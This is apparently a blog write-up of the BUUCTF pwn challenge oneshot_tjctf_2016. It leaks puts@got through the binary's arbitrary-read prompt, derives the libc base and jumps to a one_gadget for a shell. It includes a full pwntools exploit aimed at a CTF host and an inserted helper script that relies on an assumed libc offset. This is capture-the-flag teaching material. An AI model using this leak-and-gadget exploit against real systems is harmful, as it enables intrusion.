[BUUCTF]PWN——oneshot_tjctf_2016(one_gadget)

oneshot_tjctf_2016

Attachment

Steps

  1. Routine checks: 64-bit binary, NX enabled.

  2. Run it locally to get a feel for the flow.

  3. Load it in 64-bit IDA.
     Line 8 reads the value stored at whatever address is entered on line 7 and prints it; line 10 then jumps to the address entered next.

  4. Since line 10 calls whatever address we give it, the first idea is to jump to system('/bin/sh'), but the binary contains no such backdoor, so the next thing to try is a one_gadget.
    Insert picture description here

  5. Before that we need the libc base. As analysed above, line 8 prints the value at the address given on line 7, so asking it for puts@got leaks the address of puts inside libc, and from that the libc base (and every other libc address) follows.

elf = ELF('./oneshot_tjctf_2016')
puts_got = elf.got['puts']                               # GOT slot that holds puts's libc address (binary is not PIE)
p.sendlineafter(b'Read location?', str(puts_got).encode())  # the program reads and prints *puts_got
p.recvuntil(b'value:')
pause()                                                  # stop here to inspect the leaked value in the debug output

Once we have the address of puts in libc, subtracting its offset inside libc gives the libc base, and adding the one_gadget offset to the base gives the address to jump to.

libcbase = puts_addr - libc.symbols['puts']   # leaked address minus puts's offset in libc-2.23-64.so
onegadget = libcbase + one_gadget[0]          # first of the one_gadget candidates

With that in hand, just send the one_gadget address at the second prompt (the jump on line 10). one_gadget reports four candidates for this libc, each with its own register/stack constraints, so try them in turn if one fails. Here the first one happens to work.
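The leak-and-compute step above is easy to get subtly wrong (wrong libc build, mis-parsed leak), so the following is an added, offline example, not code from the original write-up, that parses a leaked value, derives the libc base with the sanity check a practitioner wants (a mapped library is page-aligned), and produces the four candidate one_gadget addresses in the order to try them. The one_gadget offsets are the ones listed on the page; the puts offset 0x6f690 is an assumed value for that libc build, and the program output is a constructed sample.

```python
import re

# Offsets for the libc the write-up uses (libc-2.23-64.so). The four one_gadget
# candidates are the ones listed on the page; PUTS_OFFSET is an assumed value for
# that build and should really be read with ELF('./libc-2.23-64.so').symbols['puts'].
PUTS_OFFSET = 0x6f690
ONE_GADGET_OFFSETS = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

# Constructed sample of what the program prints after we send puts@got at the
# "Read location?" prompt. On a real run the value changes every time (ASLR).
SAMPLE_OUTPUT = b"Read location? Value: 0x7ffff7a53690\nJump location? "


def parse_leak(output):
    """Pull the hex value the program prints after 'Value:' out of its output."""
    m = re.search(rb"value:\s*0x([0-9a-f]+)", output, re.IGNORECASE)
    if m is None:
        raise ValueError("no 'Value: 0x...' found in program output")
    return int(m.group(1), 16)


def is_plausible_base(base):
    """A shared library is mmap'ed page-aligned; a misaligned base means the leak
    was mis-parsed or the symbol offset belongs to a different libc build."""
    return base > 0 and base & 0xfff == 0


def libc_base(puts_addr, puts_offset=PUTS_OFFSET):
    """libc base = leaked address of puts minus puts's offset inside libc."""
    base = puts_addr - puts_offset
    if not is_plausible_base(base):
        raise ValueError("libc base %#x is not page-aligned; check the libc version" % base)
    return base


def gadget_candidates(base, offsets=ONE_GADGET_OFFSETS):
    """Absolute addresses of every one_gadget candidate, in the order to try them."""
    return [base + off for off in offsets]


def encode_address(addr):
    """The program parses the address as a decimal number, so that is what gets sent."""
    return str(addr).encode()


if __name__ == "__main__":
    leak = parse_leak(SAMPLE_OUTPUT)
    base = libc_base(leak)
    print("puts@libc = %#x, libc base = %#x" % (leak, base))
    for i, g in enumerate(gadget_candidates(base)):
        print("one_gadget candidate %d: %#x -> send %r" % (i, g, encode_address(g)))
```

If `libc_base` raises, do not bother trying the gadgets: the leak or the libc offsets are wrong and every computed address would be garbage.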

Full exp

from pwn import *

context.log_level = 'debug'

elf = ELF('./oneshot_tjctf_2016')
# p = process('./oneshot_tjctf_2016')
p = remote('node3.buuoj.cn', 25203)

libc = ELF('./libc-2.23-64.so')
# one_gadget candidates for this libc, as reported by the one_gadget tool
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

# 1. leak: ask the program to read puts@got, which holds puts's libc address
puts_got = elf.got['puts']
p.sendlineafter(b'Read location?', str(puts_got).encode())
p.recvuntil(b'0x')
puts_addr = int(p.recvuntil(b'\n'), 16)
log.info('puts@libc = %#x' % puts_addr)

# 2. libc base from the leak, then the one_gadget address
libcbase = puts_addr - libc.symbols['puts']
assert libcbase & 0xfff == 0, 'libc base not page-aligned: wrong libc?'
onegadget = libcbase + one_gadget[0]   # first candidate works here; try the others if it does not

# 3. the second prompt jumps to whatever address we send
p.sendline(str(onegadget).encode())

p.interactive()

Origin blog.csdn.net/mcmuyanga/article/details/113481435